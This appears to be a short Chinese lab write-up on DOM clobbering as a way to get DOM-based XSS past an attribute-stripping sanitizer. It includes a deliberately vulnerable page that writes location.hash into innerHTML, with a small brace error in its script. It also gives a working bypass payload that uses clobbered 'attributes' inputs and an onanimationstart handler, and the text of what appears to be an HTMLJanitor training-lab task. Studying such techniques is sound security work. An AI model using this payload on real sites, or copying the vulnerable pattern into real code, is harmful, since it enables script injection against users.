什么是Dom
Dom是一个与平台,编程语言无关的端口,它允许程序或者脚本动态的访问和更新文档的内容,结果和样式,处理后的结果能够成为显示的一部分,不依赖于提交数据到服务器端,从而客户端获得Dom中的数据在本地执行,如果Dom中的数据没有经过严格的确定,就会产生Dom型XSS漏洞。
编写html文件
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="author" content="system">
<meta name="keywords" content="whoami">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>
<script>alert(1)</script>
</title>
</head>
<body>
<div class="aaaaa" id="bbbbbb">aaaaaa</div>
</body>
<script>
const data = decodeURIComponent(location.hash.substr(1))
const root = document.createElement('div')
root.innerHTML = data
for(let el of root.querySelectorAll('*')){
let attrs = [];
for (let attr of el.attributes){
attrs.push(attr.name)
}
for (let name of attrs){
el.removeAttribute(name);
}
}
}
document.body.appendChild(root);
</script>
</html>
用DOM破坏实现留下非法的函数
利用style标签定义一个空动画
在动画开始的时候会触发onanimationstart事件,因为el.attributes已经被后门的两个input占了,所以标签里面的内容不会删除,只会删除input
<body>
<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert()"><input id="attributes"><input id="attributes">
结果显示
本实验使用 HTMLJanitor 库,该库容易受到 DOM 破坏。为了解决这个实验,请构造一个绕过过滤器的向量,并使用 DOM 拼接来注入一个调用 print() 函数的向量。您可能需要使用漏洞利用服务器才能使您的向量在受害者的浏览器中自动执行。
请记住更改 URL 以包含您的实验室 ID,并确保 postId 参数与您在上一步中注入 HTML 的博客文章的 postId 匹配。
存储漏洞并将其交付给受害者。